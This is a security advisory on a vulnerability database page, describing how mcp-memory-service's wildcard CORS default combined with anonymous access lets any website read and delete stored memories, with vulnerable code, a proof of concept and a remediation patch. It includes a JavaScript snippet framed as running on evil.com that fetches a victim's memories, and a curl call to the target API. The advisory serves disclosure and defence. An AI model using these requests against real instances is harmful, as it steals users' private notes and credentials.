Vulnerability Database

326,895

Total vulnerabilities in the database

mcp-memory-service's Wildcard CORS with Credentials Enables Cross-Origin Memory Theft

Summary

When the HTTP server is enabled (MCP_HTTP_ENABLED=true), the application configures FastAPI's CORSMiddleware with allow_origins=['*'], allow_credentials=True, allow_methods=["*"], and allow_headers=["*"]. The wildcard Access-Control-Allow-Origin: * header permits any website to read API responses cross-origin. When combined with anonymous access (MCP_ALLOW_ANONYMOUS_ACCESS=true) - the simplest way to get the HTTP dashboard working without OAuth - no credentials are needed, so any malicious website can silently read, modify, and delete all stored memories.

Details

Vulnerable Code

config.py:546 - Wildcard CORS origin default

CORS_ORIGINS = os.getenv('MCP_CORS_ORIGINS', '*').split(',')

This produces ['*'] by default, allowing any origin.

app.py:274-280 - CORSMiddleware configuration

# CORS middleware app.add_middleware( CORSMiddleware, allow_origins=CORS_ORIGINS, # ['*'] by default allow_credentials=True, # Unnecessary for anonymous access; bad practice allow_methods=["*"], allow_headers=["*"], )

How the Attack Works

The wildcard CORS default means every API response includes Access-Control-Allow-Origin: *. This tells browsers to allow any website to read the response. When combined with anonymous access (no authentication required), the attack is straightforward:

// Running on https://evil.com - reads victim's memories // No credentials needed - anonymous access means the API is open const response = await fetch('http://192.168.1.100:8000/api/memories'); const memories = await response.json(); // memories contains every stored memory - passwords, API keys, personal notes

The browser sends the request, the server responds with ACAO: *, and the browser allows the JavaScript to read the response body. No cookies, no auth headers, no credentials of any kind.

Clarification on allow_credentials=True: The advisory originally stated that Starlette reflects the Origin header when allow_credentials=True with wildcard origins. Testing with Starlette 0.52.1 shows that actual responses return ACAO: * (not the reflected origin); only preflight OPTIONS responses reflect the origin. Per the Fetch specification, browsers block ACAO: * when credentials: 'include' is used. However, this is irrelevant to the attack because anonymous access means no credentials are needed - a plain fetch() without credentials: 'include' works, and ACAO: * allows it.

Two Attack Vectors

This misconfiguration enables two distinct attack paths:

1. Cross-origin browser attack (CORS - this advisory)

  • Attacker lures victim to a malicious webpage
  • JavaScript on the page reads/writes the memory service API
  • Works from anywhere on the internet if the victim visits the page
  • The ACAO: * header is what allows the browser to expose the response to the attacker's JavaScript

2. Direct network access (compounding factor)

  • Attacker on the same network directly calls the API (curl http://<target>:8000/api/memories)
  • No CORS involved - CORS is a browser-only restriction
  • Enabled by 0.0.0.0 binding + anonymous access, independent of CORS configuration

The CORS misconfiguration specifically enables attack vector #1, extending the reach from local network to anyone who can get the victim to click a link.

Compounding Factors

  • HTTP_HOST = '0.0.0.0' - Binds to all interfaces, exposing the service to the entire network (enables attack vector #2)
  • HTTPS_ENABLED = 'false' - No TLS by default, allowing passive interception
  • MCP_ALLOW_ANONYMOUS_ACCESS - When enabled, no authentication is required at all. This is the key enabler: without it, the CORS wildcard alone would not allow data access (the attacker would need to forward valid credentials, which ACAO: * blocks)
  • allow_credentials=True - Bad practice: if a future Starlette version changes to reflect origins (as some CORS implementations do), this would escalate the vulnerability by allowing credential-forwarding attacks against OAuth/API-key users
  • API key via query parameter - api_key query param is cached in browser history and server logs

Attack Scenario

  1. Victim runs mcp-memory-service with HTTP enabled and anonymous access
  2. Victim visits https://evil.com which includes JavaScript
  3. JavaScript sends fetch('http://<victim-ip>:8000/api/memories') (no credentials needed)
  4. Server responds with Access-Control-Allow-Origin: *
  5. Browser allows JavaScript to read the response - attacker receives all memories
  6. Attacker's script also calls DELETE/PUT endpoints to modify or destroy memories
  7. Victim sees a normal web page; no indication of the attack

Root Cause

The default value of MCP_CORS_ORIGINS is *, which allows any website to read API responses. This is a permissive default that should be restricted to the expected dashboard origin (typically localhost). The allow_credentials=True is an additional misconfiguration that doesn't currently enable the attack.

PoC

from fastapi import FastAPI from fastapi.middleware.cors import CORSMiddleware from starlette.testclient import TestClient app = FastAPI() app.add_middleware( CORSMiddleware, allow_origins=["*"], allow_credentials=True, allow_methods=["*"], allow_headers=["*"], ) @app.get("/api/memories") def memories(): return [{"content": "secret memory data"}] client = TestClient(app) # Non-credentialed request (how the real attack works with anonymous access) response = client.get("/api/memories", headers={"Origin": "https://evil.com"}) print(response.headers["access-control-allow-origin"]) # * print(response.json()) # [{"content": "secret memory data"}] # Any website can read this response because ACAO is *

Impact

  • Complete cross-origin memory access: Any website can read all stored memories when the victim has the HTTP server running with anonymous access
  • Memory tampering: Write/delete endpoints are also accessible cross-origin, allowing memory destruction
  • Remote attack surface: Unlike direct network access (which requires LAN proximity), the CORS vector works from anywhere on the internet - the victim just needs to visit a link
  • Silent exfiltration: The attack is invisible to the victim; no browser warnings, no popups, no indicators

Remediation

Replace the wildcard default with an explicit localhost origin:

# In config.py (safe default) CORS_ORIGINS = os.getenv('MCP_CORS_ORIGINS', 'http://localhost:8000,http://127.0.0.1:8000').split(',') # In app.py - warn on wildcard if '*' in CORS_ORIGINS: logger.warning("Wildcard CORS origin detected. This allows any website to access the API. " "Set MCP_CORS_ORIGINS to restrict access.") # Also: set allow_credentials=False unless specific origins are configured app.add_middleware( CORSMiddleware, allow_origins=CORS_ORIGINS, allow_credentials='*' not in CORS_ORIGINS, # Only with explicit origins allow_methods=["*"], allow_headers=["*"], )

Affected Deployments

The vulnerability exists in the Python source code and is not mitigated by any deployment-specific configuration. Docker HTTP mode is the highest-risk deployment because it explicitly binds to 0.0.0.0, maps the port, and does not override the wildcard CORS default.

CVSS v3:

  • Severity: Unknown
  • Score:
  • AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

CWEs:

Software From Fixed in
Python icon mcp-memory-service - 10.25.1

Frequently Asked Questions

A security vulnerability is a weakness in software, hardware, or configuration that can be exploited to compromise confidentiality, integrity, or availability. Many vulnerabilities are tracked as CVEs (Common Vulnerabilities and Exposures), which provide a standardized identifier so teams can coordinate patching, mitigation, and risk assessment across tools and vendors.

CVSS (Common Vulnerability Scoring System) estimates technical severity, but it doesn't automatically equal business risk. Prioritize using context like internet exposure, affected asset criticality, known exploitation (proof-of-concept or in-the-wild), and whether compensating controls exist. A "Medium" CVSS on an exposed, production system can be more urgent than a "Critical" on an isolated, non-production host.

A vulnerability is the underlying weakness. An exploit is the method or code used to take advantage of it. A zero-day is a vulnerability that is unknown to the vendor or has no publicly available fix when attackers begin using it. In practice, risk increases sharply when exploitation becomes reliable or widespread.

Recurring findings usually come from incomplete Asset Discovery, inconsistent patch management, inherited images, and configuration drift. In modern environments, you also need to watch the software supply chain: dependencies, containers, build pipelines, and third-party services can reintroduce the same weakness even after you patch a single host. Unknown or unmanaged assets (often called Shadow IT) are a common reason the same issues resurface.

Use a simple, repeatable triage model: focus first on externally exposed assets, high-value systems (identity, VPN, email, production), vulnerabilities with known exploits, and issues that enable remote code execution or privilege escalation. Then enforce patch SLAs and track progress using consistent metrics so remediation is steady, not reactive.

SynScan combines attack surface monitoring and continuous security auditing to keep your inventory current, flag high-impact vulnerabilities early, and help you turn raw findings into a practical remediation plan.